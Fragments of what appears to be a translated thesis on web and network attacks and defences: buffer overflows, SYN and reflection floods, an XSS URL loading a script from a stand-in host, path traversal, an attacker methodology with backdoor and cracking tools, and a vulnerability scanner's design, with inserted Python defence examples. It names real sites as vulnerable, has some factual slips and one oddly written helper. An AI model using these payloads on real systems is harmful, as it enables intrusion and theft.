The Stack region is memory reserved during program execution to hold the values of a function's local variables, the call parameters and the return values. The stack is operated on a "last in, first out" (LIFO) basis with two main instructions, PUSH and POP. Within the scope of this work, the thesis focuses only on the stack region.
II.1. Stack
The stack is the memory region used to store a function's parameters and local variables, the EBP value (the address of the stack base) and the return address. Variables are allocated from high addresses towards low addresses. The stack operates on the "last in, first out" (LIFO) principle: the values pushed onto the stack last are the first to be popped.
PUSH a value onto the stack:
(1) ESP = ESP - size of the value
(2) the value is written onto the stack
POP a value off the stack
0x401F2034  call procedure Q   -> procedure Q is called and executed
0x401F2035  (next instruction)
0x40209876  procedure Q
0xFFFFFFFF
When the instruction at address 0x401F2034 is executed, the address space looks like this:
0x0012FF00 ---------------------------- top of the stack
0x0012FF01
0x0012FF02
0x0012FF03
0x0012FF04
0x0012FF05
0x0012FF06
0x0012FF07
0x0012FF08 ---------------------------- bottom of the stack
(stored bytes: 40 1F 20 35)
Thus the address following the call instruction is put on the STACK. When procedure Q is about to finish its job and return, the process retrieves the address stored earlier on the STACK and resumes execution there. This address is called the saved return address. Note: the EIP register always points to the address of the next instruction to be executed.
Example 8.II.3-2:
strcpy(one, two);
printf("Okie\n");
then the return address points to the location of the call to printf in memory, and when strcpy finishes, the instruction pointer points there.
(1) Overwrite the buffer (up to the return address) with the address of the buffer. (2) Place the shellcode in the buffer. The return address then points to the shellcode, and the shellcode spawns a root shell. However, it is hard to make the return address point exactly at the shellcode. One way to accomplish this difficult task is to put a series of NOP instructions (No Operation) at the start of the buffer and place the shellcode after the NOPs. Then, when the return address is changed to point anywhere in the first part of the buffer, the NOP instructions execute and do nothing until the shellcode is reached, and the shellcode does its job of spawning a root shell. The stack looks like this:
bottom of memory                                              top of memory
<----- FFFFF NNNNNNNNNNNSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF
top of the stack                                              bottom of the stack
N = NOP   S = shellcode   A = pointer to the shellcode   F = other data
Remarks:
This is the attack technique that goes deepest into the system; it requires the hacker to understand memory organisation and assembly language thoroughly. However, that is required only if the hacker wants to take control of the system. If the hacker merely alters the size of the input sent to the server, once the data reaches the system it can be brought down because it lacks the capacity to process that data. This kind of attack is similar to the denial-of-service attack described in more detail in the next chapter.
Chapter 9
DENIAL OF SERVICE
Contents:
I. Concept
II. Ways a system can be attacked with DoS
III. Attack techniques
IV. Countermeasures
I. CONCEPT
A DoS attack is one that paralyses network services so that they can no longer respond to requests. This kind of attack affects many systems, is very easy to carry out, and is very hard to protect a system against. DoS attacks usually rely on protocols. For example, with the ICMP protocol, a hacker can use an e-mail bomb to send thousands of e-mail messages with the aim of consuming bandwidth and draining the mail server's resources. Or software can be used to send a flood of requests to the server so that it cannot respond to other legitimate requests.
ATTACKS ON RAM: a DoS attack that seizes a large share of RAM can also cause problems that destroy the system. The buffer overflow attack is one example of this kind of destruction (see chapter .. for more detail).
ATTACKS ON DISKS: a classic attack is to fill the hard disk. The disk can overflow and become unusable.
Step 1: The client sends a SYN packet requesting a connection.
Step 2: If the server accepts the connection, it sends a SYN/ACK packet. The server is obliged to send this acknowledgement because TCP is a reliable standard: if the client does not receive the acknowledgement, it assumes the packet was lost and sends a new one.
Step 3: The client replies with an ACK packet, telling the server that it received the SYN/ACK; the connection is now established.
III.2. Abusing TCP for the traditional SYN flood method:
As mentioned about connection establishment in part 1, for every SYN packet the server must set aside part of the system's resources, such as memory buffers, to receive and transmit data for that connection. System resources are finite, however, and the hacker will try every way to push the system past that limit. (This is also called a half-open connection, because the client has opened the connection between them.) Per figure 9.III.2-1: after the server replies with a SYN/ACK packet accepting the connection from the requesting machine, if the requester's IP address is forged the packet cannot reach its destination, yet the server must still reserve resources for that request. After some time with no response from the client, the server sends another SYN/ACK to confirm, and so on; the connection stays open. If the hacker sends enough SYN packets that the server can no longer accept any more connections, the system breaks down.
Conclusion: with only a small-bandwidth link, a hacker can break a system. Moreover, the hacker's IP address can be altered, so identifying the culprit is extremely difficult.
III.3.2. The second type of attack
This type of attack is used when the hacker's network link is far slower than the server's. Unlike the traditional DoS attack (part 2), this attack on bandwidth exploits packets from many different systems at once converging on the target system, so that the target's link can no longer cope and the server can no longer receive any packets.
Per figure 9.III.3.2-1, all packets enter a network through a "Big-Pipe" (large pipe), and the router then splits them into "Small Pipes" (small pipes) to the many hosts according to each packet's IP address. But if the entire "Big-Pipe" is flooded with packets destined for one particular host in the network, the router must drop most of the packets, letting through only as many as fit the "Small Pipe" of that host. This attack knocks the server off the Internet. It is a denial-of-service attack but not DoS; it is called DDoS (distributed denial of service), meaning that many machines are set off at once to send packets to the server (although each machine's link is not fast, many links combine into one Big Pipe), leaving the server unable to receive packets and cut off from the Internet, as the following illustration shows:
DRDoS (Distributed Reflection Denial of Service), the next generation of DDoS: this was also the cause of the grc.com site being brought down. The following figure illustrates a DRDoS attack.
By forging the server's IP address, the hacker sends many packets at once to powerful systems on the network. On receiving these forged SYN packets, these systems accept the connection and reply with SYN/ACK packets. Because the source address of the SYN packets was altered by the hacker to the server's IP address, the SYN/ACK packets are sent to the server. Receiving so many packets at once, the server's link cannot cope; the server refuses to accept any packets and the system collapses.
However, there is also software capable of averting this kind of attack. For example, Linux kernels 2.0.30 and later have an option called SYN Cookie: the kernel tracks and records possible signs of a SYN attack, then uses a cryptographic protocol, the SYN cookie, to let legitimate users of the system keep connecting to it. Windows NT 4.0 and later use a backlog technique: whenever the connection queue cannot cope, the system automatically provides more resources to the queue, so the queue does not break down. The application should allow each client to establish only up to a set maximum number of connections, to prevent the hacker from sending many requests at once and causing congestion.
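To show what SYN cookies change, here is an added Python model (not from the thesis) of the two server behaviours described above: a classic half-open table with a fixed backlog, and a server whose SYN/ACK sequence number is an HMAC over the client's address, port and a coarse time slot, so it stores nothing until the ACK proves the client is real. The class names, the 64-second slot, the backlog size and the addresses are assumptions for the illustration.

```python
import hashlib
import hmac


class StatefulServer:
    """Classic behaviour: every SYN reserves a half-open slot until the ACK
    arrives or a timeout fires. Spoofed SYNs never ACK, so the table fills."""

    def __init__(self, backlog: int = 128):
        self.backlog = backlog
        self.half_open = {}        # (src_ip, src_port) -> ISN we sent
        self._next_isn = 1000

    def on_syn(self, src_ip, src_port):
        if len(self.half_open) >= self.backlog:
            return None            # backlog full: SYN dropped, legitimate or not
        self._next_isn += 1
        self.half_open[(src_ip, src_port)] = self._next_isn
        return self._next_isn      # sequence number carried in our SYN/ACK

    def on_ack(self, src_ip, src_port, ack):
        isn = self.half_open.pop((src_ip, src_port), None)
        return isn is not None and ack == isn + 1


class SynCookieServer:
    """SYN cookies: the SYN/ACK sequence number encodes an HMAC of the peer
    address, port and time slot. No state is kept; the third packet's ACK
    number is checked by recomputing the cookie, so forged SYNs cost nothing."""

    SLOT_SECONDS = 64              # coarse time slot; a cookie is valid for two slots

    def __init__(self, secret: bytes):
        self._secret = secret

    def _cookie(self, src_ip, src_port, slot) -> int:
        msg = f"{src_ip}:{src_port}:{slot}".encode()
        mac24 = int.from_bytes(hmac.new(self._secret, msg, hashlib.sha256).digest()[:3], "big")
        return ((slot & 0xFF) << 24) | mac24       # 8-bit slot, 24-bit MAC

    def on_syn(self, src_ip, src_port, now: float) -> int:
        return self._cookie(src_ip, src_port, int(now) // self.SLOT_SECONDS)

    def on_ack(self, src_ip, src_port, ack, now: float) -> bool:
        slot = int(now) // self.SLOT_SECONDS
        isn = (ack - 1) & 0xFFFFFFFF
        return any(isn == self._cookie(src_ip, src_port, s) for s in (slot, slot - 1))


def flood_walkthrough(spoofed_syns: int = 200):
    """Return (legit handshake completes on stateful server?, on cookie server?,
    cookie accepted with wrong port?, cookie accepted two slots later?,
    half-open entries left behind on the stateful server)."""
    stateful = StatefulServer(backlog=128)
    cookies = SynCookieServer(secret=b"constructed-demo-secret")
    for i in range(spoofed_syns):             # forged sources never complete the handshake
        src = (f"203.0.113.{i % 254 + 1}", 40000 + i)
        stateful.on_syn(*src)
        cookies.on_syn(*src, now=1000)
    client = ("198.51.100.20", 51515)
    isn = stateful.on_syn(*client)
    stateful_ok = isn is not None and stateful.on_ack(*client, isn + 1)
    cookie = cookies.on_syn(*client, now=1000)
    cookie_ok = cookies.on_ack(*client, cookie + 1, now=1010)
    wrong_port = cookies.on_ack(client[0], 51516, cookie + 1, now=1010)
    too_late = cookies.on_ack(*client, cookie + 1, now=1140)   # slot 17: a slot-15 cookie is stale
    return stateful_ok, cookie_ok, wrong_port, too_late, len(stateful.half_open)


if __name__ == "__main__":
    print(flood_walkthrough())
```

After 200 forged SYNs the stateful server still holds 128 half-open entries and turns the real client away, while the cookie server, having kept nothing, completes the real handshake and still rejects an ACK for a different port or from an expired slot.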
Remarks:
Although a denial-of-service attack only brings the system down for a few minutes, the consequences are considerable (financial impact and loss of reputation). Hackers typically use this technique when they cannot take administrative control of the system or its information, or when they want to damage the organisation's reputation. Moreover, forging addresses makes it easier for the hacker to carry out the attack without fear of detection. Usually the technique is carried out with the help of a few tools such as ping of death and teardrop; these tools are listed further in chapter 8 below.
Chapter 10
Example 10.I.1-1:
http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22htt p%3a%2f%2fwww.yourserver.com%2fbadscript.js%22%3e%3c%2fscript%3e
...path traversal. The hacker can ask the server to return as its result the contents of physical files such as /etc/password. In summary: this attack also relies on laxity in checking the data in the URL, cookies and request HTTP headers. By abusing the application's permission to access a file, the hacker can read files stored on the system. Example 10.II.1-1:
http://maydich.com/show.asp?result=dangnhapthanhcong.asp
II.2.
Preventing path traversal attacks is a big challenge for application developers in a distributed system. Nevertheless, the best defence remains that the application checks file access before returning the result to the browser.
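One way to do that check, as an added Python example (not from the thesis): resolve the requested name strictly inside the application's page directory before reading anything, handling the encodings and null bytes an attacker would try. The document root, the .asp allowlist and the sample requests are assumptions; the module uses posixpath so it models the Unix server regardless of where it runs.

```python
import posixpath
from urllib.parse import unquote

PAGE_ROOT = "/var/www/app/pages"        # assumed document root for show.asp
ALLOWED_SUFFIXES = (".asp",)            # assumed: only pages may be included


def resolve_page(requested: str, root: str = PAGE_ROOT):
    """Map the 'result' parameter to an absolute path under root, or None.

    Order matters: decode first (twice, to catch %252e double encoding),
    reject embedded null bytes, normalise away '..' and backslashes, then
    prove the result is still under root before any file is opened."""
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:
        return None
    relative = decoded.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if posixpath.commonpath([root, candidate]) != root:
        return None
    if not candidate.endswith(ALLOWED_SUFFIXES):
        return None
    return candidate


# Constructed requests a server might see for show.asp?result=...
SAMPLE_REQUESTS = [
    "dangnhapthanhcong.asp",
    "sub/../login.asp",
    "../../../../etc/passwd",
    "%2e%2e/%2e%2e/etc/passwd",
    "..%252f..%252fetc%252fpasswd",
    "..\\..\\..\\etc\\passwd",
    "../../etc/passwd%00.asp",
    "/etc/passwd",
]


def triage(requests=SAMPLE_REQUESTS):
    """Resolve each sample request; None means the request is refused."""
    return {r: resolve_page(r) for r in requests}


if __name__ == "__main__":
    for req, path in triage().items():
        print(f"{req!r:32} -> {path}")
```

The normalise-then-compare step is what actually enforces the boundary; the decoding, null-byte and suffix checks only make sure the comparison sees the same path the file system would, and that a file under the root is still of a kind the page is meant to include.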
<!--#include file="test.asp"-->
The statement above embeds the contents of the file test.asp into the web page. However, SSI is not supported by most web servers; Apache and IIS are two servers that support SSI. A web page using SSI is usually saved with the extension .shtml or .stm (instead of .html or .htm) to tell the server that the page uses SSI, which saves the server processing time (no time is wasted searching). The process of handling a requested web page: if there is no other directive, the server just sends the page's contents to the browser, but with an SSI the work proceeds in these steps:
o The server receives the data and parses it (finding and classifying the special directives) in order to execute them.
o Based on the directives found, the server executes them to produce the result for the browser.
o The result is returned to the browser.
There are three things SSI can do:
o Read information from a file and insert it into the page
o Assign values to some variables
o Call a CGI program
The SSI directives are described in the appendix.
Chapter 11
According to the book Hacking Exposed by Stuart McClure, Joel Scambray and George Kurtz, attackers usually carry out the following stages when attacking:
The third step is to look for poorly protected resources, or user accounts that can be used to intrude, including default passwords and default scripts and services. Many network administrators are unaware of these values or do not change them. Supporting tools: null sessions, DumpACL, sid2user, OnSite Admin, showmount, NAT, Legion, banner grabbing with telnet, netcat, rpcinfo.
Step 4: Gaining access: the hacker now tries to get into the network using the information gathered in the three steps above. The methods used here may be buffer overflow attacks, grabbing and cracking the password file, or brute-forcing passwords (trying every possibility). Tools: tcpdump, L0phtcrack readsmb, NAT, legion, tftp, pwdump2 (NT), ttdb, bind, IIS, HTR/ISM.DLL.
Step 5: Escalating privilege: once the hacker has got into the network with some account, they try to take control of the whole system. The hacker tries to crack the admin password or uses a privilege-escalation hole. John the Ripper is a very commonly used password-cracking program. Tools: L0phtcrack, Ic_messages, getadmin, sechole.
Step 6: Pilfering (used when files containing passwords are carelessly exposed):
Once more the search engines are used to find ways into the network. Text files containing passwords or other insecure mechanisms may be where the hacker looks. With the information obtained in the steps above, we locate the server and control it. If this step fails, go to step <9>. Supporting tools: rhost, LSA Secrets, user data, configuration files, Registry.
Step 7: Covering tracks: after getting the information they need, the hacker tries to erase traces, deleting the operating system's log files so that the administrator does not notice the intrusion, or if they do, cannot find out who the intruder was. Clear logs. Tools: Zap, Event log GUI, rootkits, file streaming.
Step 8: Creating backdoors (to make the next intrusion easier): the hacker leaves "back doors", that is, a mechanism that lets them return through a secret path without much effort, by installing a Trojan or creating a new user (in organisations with many users). The tools here are the various Trojans, keyloggers, creating rogue user accounts, scheduling batch jobs, infecting startup files, planting remote control services, installing monitoring mechanisms, replacing apps with Trojans.
Tools: members of wheel, administrators, cron, At, rc, Startup folder, registry keys, netcat, remote.exe, VNC, BO2K, keystroke loggers, add acct to secadmin mail aliases, login, fpnwclnt.dll
+ Find the SAM file (this is the file holding Windows NT passwords; use L0phtCrack to crack it) by going to http://www.google.com and typing file:SAM
Attacks that bypass the control mechanisms (authentication, authorization). These include methods such as guessing passwords, altering cookie information, directory traversal techniques, privilege escalation, and SQL-based attacks such as SQL injection...
Study the web application's functions in depth. Study how the parts of the application are implemented, notably order input, confirmation and order tracking. Here methods such as SQL injection and input validation can be applied...
Study the flow of information. The information exchanged between client and server, and the information exchanged with the database. Today, code that handles communication must be efficient (fast) and secure (which may be slower). Usually efficiency takes priority, so errors may arise in the process and help the hacker exploit flaws such as SQL input... to seize control of the system.
III. ATTACK
After gathering information and examining the target carefully, the hacker begins the attack in order to break into the system to obtain information, insert malicious information, or seize control. And if the intrusion fails, DoS is the last resort the hacker usually chooses, to make the system unable to operate.
Remarks:
Gathering information is extremely important for attacking a server. Whether the hacker attacks at the hardware level or through the application, gathering information is still necessary. The question is how to carry it out step by step. The hacker may not need to go through the steps in order, or through all of them, but a clear grasp of information about the server is always the prerequisite for a successful attack. Depending on what information the hacker collects, the hacker decides which technique to attack with. Therefore, securing a system requires the combined effort not only of the system administrator but also of the application designer, and the cooperation of the customers who use the application. This task is discussed in more detail in chapter 12.
Chapter 12
Defending against hackers is not the task of web programmers alone; it also needs the cooperation and support of the administrator and of the users themselves. A gap in any one of these can lead to stolen information, and even to the hacker controlling the whole network. To protect a system against hacker attacks, the thesis therefore presents three roles: the network administrator, the application programmer and the user.
Identifying the risks to a system means identifying the security holes in the services and applications running on it. Identifying these risks correctly lets the administrator avoid network attacks, or take the right protective measures, by regularly following the security newsgroups and the software vendors' bulletins to learn about flaws in the software in use. When a flaw is reported, update to the latest version so that a hacker cannot exploit holes that are still unpatched in the old version.
Understand how the software in use works and the meaning of the important configuration files (such as /etc/passwd), and protect the configuration by recording hashes of it (the thesis suggests MD5; for integrity checking today a collision-resistant hash such as SHA-256 is the usual choice).
Use tools that can detect unauthorised access to a system, such as log files.
Control the privileges of the accounts on the system strictly; do not use root where it is not necessary. Change the password of, or remove, accounts that are no longer used.
Manage passwords strictly:
o Force users to change their password after a fixed period. Most systems support this mechanism; if the password is not changed, the account is no longer valid on the system.
o When a user has lost a password, issuing a new one must require other procedures to authenticate the user ...
Many applications today manage a user's session with a sessionID, but weak session management lets a hacker take over a user's session easily, as described in the session management technique. An application should therefore destroy a session as soon as the browser closes the connection.
Encrypt important data: sensitive information such as username/password and credit card numbers must be encrypted, so that a hacker who obtains it (for instance via XSS or SQL Injection) cannot use it. In transit, SSL should be used as well, to avoid losing information on the wire. There are many encryption methods, such as secret-key and public-key encryption, so depending on the level of use and the importance of the data the application can choose one that keeps the data confidential. However, many applications derive the encrypted value from information such as the date/time or IP address, which a hacker can easily guess, or the encrypted content is so short that a hacker can enumerate every possibility with readily available tools, as in the sessionID attack technique. Or the encryption method is so old that a hacker can easily break it with tools such as John the Ripper. The encryption algorithm and key must therefore be chosen so that the data can be neither guessed nor exhausted by brute force.
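The point in the paragraph above, that a value derived from date/time and IP address stays guessable no matter how it is hashed, can be shown with a small comparison. This is an added example, not code from the thesis or the Web Checker program; the weak scheme (`md5(ip:timestamp)`) is a hypothetical one built to illustrate the warning, and the attacker's search window and candidate-IP count are assumed values.

```python
"""Added example (not from the thesis): a session ID built from guessable
inputs versus one drawn from the operating system's CSPRNG."""
import hashlib
import math
import secrets
from typing import Optional


def weak_session_id(client_ip: str, ts: int) -> str:
    """Hypothetical weak scheme: hash of client IP and a UNIX timestamp.
    Hashing hides the inputs but does not enlarge the space they come from."""
    return hashlib.md5(f"{client_ip}:{ts}".encode()).hexdigest()


def strong_session_id(nbytes: int = 32) -> str:
    """32 random bytes (256 bits) from the CSPRNG, URL-safe encoded."""
    return secrets.token_urlsafe(nbytes)


def weak_search_space(window_seconds: int, candidate_ips: int) -> int:
    """Candidates an attacker who knows the scheme must try: every second in
    the window times every plausible client address."""
    return window_seconds * candidate_ips


def entropy_bits(search_space: int) -> float:
    """log2 of the search space, for comparison with the 256-bit strong ID."""
    return math.log2(search_space)


def brute_force_weak(target: str, client_ip: str, approx_ts: int,
                     window: int) -> Optional[int]:
    """Recover the timestamp behind a weak ID by trying each second around the
    attacker's estimate of when the session was created."""
    for ts in range(approx_ts - window, approx_ts + window + 1):
        if weak_session_id(client_ip, ts) == target:
            return ts
    return None


if __name__ == "__main__":
    # Assumed: the attacker knows the victim's IP and the login time to within
    # ten minutes (constructed values).
    victim_id = weak_session_id("10.0.0.5", 1_000_000)
    print("recovered timestamp:", brute_force_weak(victim_id, "10.0.0.5", 1_000_300, 600))
    print("weak ID entropy (1h window, 256 IPs): %.1f bits"
          % entropy_bits(weak_search_space(3600, 256)))
    print("strong ID:", strong_session_id())
```

The weak ID looks random (32 hex digits) but an attacker who knows the scheme needs under 2^20 guesses for an hour-long window and a /24 of client addresses, whereas the CSPRNG value gives 256 bits with nothing to guess from.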
In addition, using SSL is necessary to avoid data being stolen in transit.
Use available software: products such as AppShield act as a proxy, that is, as an intermediary between client and server. Every request from the client passes through it; if the request is found to contain a possible attack on the system, it is rejected and dropped instead of being forwarded to the server.
Set privileges: the system should grant an application only the privileges it needs to perform its functions. Never grant the highest privilege, such as root, because a hacker could then use it to execute system commands, as in the SQL Injection and Buffer Overflow attack techniques.
... to prevent the hacker from continuing to use a still-valid session ID to log in to the system as a legitimate user.
Account management: users must be aware of their important role in protecting their own account. Account management includes protecting the password, changing it periodically, registering the times of use, ... using protective software on the user's workstation, logging out of the system after a time-out, ...
o Detecting unauthorised use of an account: users need to be trained in how to detect that their account is being used without authorisation. Users should check their own activity regularly to make sure nobody else is using the account to perform other actions.
Remarks:
Although security is difficult and a system can never be considered 100% safe, the full combination of the three factors above reduces the possible risks to a minimum. If any one of the three is missing, the system is permanently in a state of security alert.
PART THREE
Chapter 13
I.2. Requirements
From the ideas above, the application has the following requirements:
III. IMPLEMENTATION
III.1. Implementation language
Web Checker is an application that uses the HTTP protocol to exchange information over the network. To keep the programming simple, the application has to make use of the network programming libraries and ActiveX controls already available in the development environment. An equally important factor is that the chosen language and environment must be familiar, so that they can be used quickly and easily to build the application. For these reasons the thesis chose MS Visual C++ as the development environment. System requirements: o Operating system: Windows XP, NT, 2000 or 9x with the TCP/IP protocol. o Network: an Internet connection, or a web server on the local machine. o Hardware: 10 MB of free disk space.
III.2. Implementation method
III.2.1. Using a dialog-based interface
Because the application is built for simplicity and ease of use and consists of a single screen, the dialog model was chosen for the interface.
    // Members of the dialog class (derived from CDialog)
    CArray<Result *, Result *> m_result;  // check results
    CArray<Test *, Test *>     m_Test;    // test patterns read from test.txt
    bool    m_IsPost;        // request type: POST/GET
    CString m_sData;         // data in the request header
    CString m_HTTPbody;      // body of the HTTP response
    CString m_HTTPreceive;   // response header
    CString m_HTTPsend;      // request header
    ...
protected:
    // Event handler for the embedded web browser control
    afx_msg void OnBeforeNavigate2Explorer(LPDISPATCH, VARIANT FAR*, VARIANT FAR*,
                                           VARIANT FAR*, VARIANT FAR*, VARIANT FAR*,
                                           BOOL FAR*);
private:
Inherited from CDialog; besides managing the dialog, the class has the following functions: it carries out the user's browsing requests through the Browse() method; it displays the data in m_HTTPbody as a web page through InsertHTML(); getTextFile() reads the test patterns from the file as soon as the program starts and stores them in the m_Test array; scanWeb() is the main method, called when the user presses the check button, and it calls the other processing functions to check the web page, analyse it and produce the results.
Class Checker
class Checker
{
public:
    Checker();
    virtual ~Checker();
    void    inject(CString &, int, CString);                               // insert a test pattern into the data
    CString getForumValue(int, CString, CString &, CString &, CString &);  // get the data of a form
    CString getLinkValue(int, CString, CString &, CString &);              // get the data of a link
    ...
};
Definition of the methods: the real data of the objects to be checked (the forms and links in the page) is retrieved first; the program then inserts the test patterns one by one through inject() and sends the result to the server. inject() inserts a test value into the data of the form or link.
Class Request
class Request
{
public:
    Request();
    virtual ~Request();
private:
    // Split a URL string into protocol, host, request path and port
    void ParseURL(LPCSTR url, LPSTR protocol, int lprotocol, LPSTR host, int lhost,
                  LPSTR request, int lrequest, int *port);
    // Open the connection, send the HTTP request and receive the HTTP response
    int SendHTTP(LPCSTR url, LPCSTR headers, BYTE *post, DWORD postLength,
                 HTTPRequest *req);
public:
    // A GET request uses the ActiveX control's own mechanism; a POST calls SendHTTP
    void SendRequest(bool IsPost, LPCSTR url, CString &psHeaderSend,
                     CString &psHeaderReceive, CString &psMessage);
    ...
};
These are the low-level methods that communicate directly with the server:
SendHTTP is called through SendRequest() and Browse(). It creates the connection to the server, sends the request and receives the reply message from the server. The received messages are stored in the global variables m_HTTPsend, m_HTTPreceive and m_HTTPbody.
Class Test
class Test
{
public:
    Test();
    virtual ~Test();
    CString m_errType;                  // vulnerability type
    CString m_errName;                  // vulnerability name
    CString m_strInject;                // string to inject
    CArray<CString, CString> m_strRslt; // result strings that indicate the vulnerability
};
Defines the test-pattern data type. The data is read from the file test.txt, whose layout (one test per record; in the sample, \1 separates the fields and \2 ends the record) is:
String to inject | Result patterns that reveal the flaw                        | Error number | Error name
%27\1            | ... incorrect syntax\1unclosed quotation mark\1 ... ...      | 1\2          | SQL Injection
...
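The loop that scanWeb(), inject() and the Test records above describe, as an added example in Python (this is not the thesis's Web Checker code). The test.txt layout is taken as: fields separated by \x01, the error name after \x02, one record per line; that split is an assumption made here. Only query parameters of links are covered, the server is a constructed stand-in (`fake_fetch`) so the example runs offline, and the URL used is a placeholder.

```python
"""Added example (not the thesis's Web Checker code): parse test records,
inject each payload into every query parameter of a link, and match the
response against the error signatures. fake_fetch is a constructed server."""
from dataclasses import dataclass
from typing import Callable, Dict, List
from urllib.parse import parse_qsl, unquote, urlencode, urlsplit, urlunsplit

# Constructed sample in the assumed test.txt layout: two SQL Injection records.
SAMPLE_TEST_FILE = (
    "%27\x01incorrect syntax\x01unclosed quotation mark\x011\x02SQL Injection\n"
    "%27%20or%201=1--\x01incorrect syntax\x01odbc drivers error\x011\x02SQL Injection\n"
)


@dataclass
class Test:
    inject: str          # string inserted into the parameter value (m_strInject)
    patterns: List[str]  # error signatures searched for in the response (m_strRslt)
    err_index: int
    err_name: str        # m_errName


def parse_tests(text: str) -> List[Test]:
    """One test per line: payload, patterns..., index, then \\x02 and the name."""
    tests = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields, _, name = line.partition("\x02")
        parts = fields.split("\x01")
        tests.append(Test(parts[0], parts[1:-1], int(parts[-1]), name.strip()))
    return tests


def inject_into_url(url: str, param: str, payload: str) -> str:
    """Append the (URL-encoded) payload to one query parameter, keeping the rest."""
    parts = urlsplit(url)
    query = [(k, v + unquote(payload) if k == param else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(query)))


def find_errors(body: str, tests: List[Test]) -> List[Test]:
    """Tests whose signatures occur in the response (case-insensitive match)."""
    low = body.lower()
    return [t for t in tests if any(p.lower() in low for p in t.patterns)]


def scan_url(url: str, fetch: Callable[[str], str], tests: List[Test]) -> List[Dict]:
    """scanWeb() for links: inject every test into every parameter, record the hits."""
    results = []
    parts = urlsplit(url)
    for param, _ in parse_qsl(parts.query, keep_blank_values=True):
        for test in tests:
            body = fetch(inject_into_url(url, param, test.inject))
            for hit in find_errors(body, [test]):
                results.append({"object": f"link {parts.path}", "param": param,
                                "err_index": hit.err_index, "err_name": hit.err_name})
    return results


def fake_fetch(url: str) -> str:
    """Constructed server: /out/ concatenates id into SQL and leaks the database
    error; /safe/ rejects anything that is not a number before touching the DB."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    value = query.get("id", "")
    if parts.path == "/out/":
        if "'" in value:
            return ("<html>Microsoft OLE DB Provider for ODBC Drivers error '80040e14'"
                    " Unclosed quotation mark before the character string ''.</html>")
        return f"<html>News item {value}</html>"
    if parts.path == "/safe/":
        if not value.isdigit():
            return "<html>Bad request</html>"
        return f"<html>News item {value}</html>"
    return "<html>Not found</html>"


if __name__ == "__main__":
    for hit in scan_url("http://example.com/out/?id=5", fake_fetch,
                        parse_tests(SAMPLE_TEST_FILE)):
        print(hit)
```

The detection is only as good as the signature list: a server that returns a generic error page (the /safe/ path above, or any page that swallows database errors) produces no hit even when the underlying query is still built by concatenation, which is the limitation section IV.2 below describes.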
Class Result
class Result
{
public:
    Result();
    virtual ~Result();
    CString m_object;      // object checked
    int     m_ind;         // position in the web page
    CString m_properties;  // properties of the object
};
Defines the result data type, which stores the check results for the web page; they are shown on the program screen once the page has been checked, through the ShowResult() method.
The application screen has three main parts: Web application: acts like a browser that opens the page to be checked and shows the result by marking, directly at each checked position in the page, whether it is safe or unsafe.
Results: lists the results after the check: the checked positions, safe or unsafe, and the vulnerabilities each position suffers from. Advice: if a vulnerability is found, selecting its name in the results pane shows how to defend against it.
The program marks the checked positions directly in the web page (green = safe, red = unsafe).
IV.1. Results achieved
Detects some security flaws, such as SQL Injection, Form Field Manipulation and URL Manipulation, in a web application on the Internet, illustrating the theory of those techniques. Shows the result for each checked position clearly and visually. Gives suggestions and countermeasures for the flaws found.
Example 13.IV.1-1: the program found an SQL Injection flaw in the web application www.progenic.com; specifically, the links to news items did not validate their input.
http://www.progenic.com/out/?id=5 ...
IV.2. Limitations
Because it uses a very simple mechanism (send a test, evaluate the response received), the program cannot detect complex security flaws. Its effectiveness is low for applications with an unusual design.
Example 13.IV.2-1: the program did not find the flaw in the web application www.thanglongmetalwares.com/sanpham.asp even though the application has an SQL Injection flaw. The reason is that the application stores the SQL query itself in a form object, so when the program tests the form it changes the query and thereby changes the behaviour of the application. Note that a hidden field carrying the raw SQL statement is a flaw in its own right, independent of the checker: any client can replace the statement with one of its own choosing.
<form method="post" action="Sanpham.asp" name="Sanpham">
  <input type="hidden" name="strSQL" value="SELECT * FROM Products Where Language = 1 ORDER BY Date DESC">
  <input type="hidden" name="Page" value="1">
  ...
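The hidden-field pattern above, and the fix a practitioner would apply, as an added example (not code from the thesis or from the site it names). The vulnerable handler executes whatever arrives in strSQL, as the page's form implies; the fixed handler keeps the statement on the server and binds only a validated language code and page number. The in-memory SQLite tables and their rows are constructed for the example; column names follow the hidden field's query.

```python
"""Added example (not from the thesis): executing a client-supplied SQL
statement from a hidden form field, beside the server-side fix."""
import sqlite3
from typing import Dict, List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed data: a product table matching the hidden field's query and
    a user table the attacker would like to read."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Products (Id INTEGER, Name TEXT, Language INTEGER, Date TEXT);
        CREATE TABLE Users (Username TEXT, Password TEXT);
        INSERT INTO Products VALUES (1, 'Spoon', 1, '2004-01-02'),
                                    (2, 'Fork',  2, '2004-01-03'),
                                    (3, 'Knife', 1, '2004-01-04');
        INSERT INTO Users VALUES ('admin', 's3cret');
    """)
    return conn


def vulnerable_page(conn: sqlite3.Connection, form: Dict[str, str]) -> List[Tuple]:
    """The pattern on the page: the statement comes from the hidden strSQL field
    and is run as-is, so whoever edits the form chooses the statement. A scanner
    that appends a quote to strSQL only breaks the statement, which is why the
    checker produced no useful result here."""
    return conn.execute(form["strSQL"]).fetchall()


def safe_page(conn: sqlite3.Connection, form: Dict[str, str]) -> List[Tuple]:
    """Fix: the statement lives on the server; the client sends only a language
    code and page number, which are validated and bound as parameters."""
    try:
        language = int(form.get("Language", "1"))
        page = int(form.get("Page", "1"))
    except ValueError:
        raise ValueError("Language and Page must be integers")
    if page < 1:
        raise ValueError("Page must be positive")
    page_size = 10
    return conn.execute(
        "SELECT * FROM Products WHERE Language = ? ORDER BY Date DESC LIMIT ? OFFSET ?",
        (language, page_size, (page - 1) * page_size),
    ).fetchall()


def rejects(conn: sqlite3.Connection, form: Dict[str, str]) -> bool:
    """True when safe_page refuses the form (tampered input is caught)."""
    try:
        safe_page(conn, form)
    except ValueError:
        return False if False else True
    return False


if __name__ == "__main__":
    db = make_db()
    tampered = {"strSQL": "SELECT Username, Password, 0, '' FROM Users", "Page": "1"}
    print("vulnerable handler, tampered form:", vulnerable_page(db, tampered))
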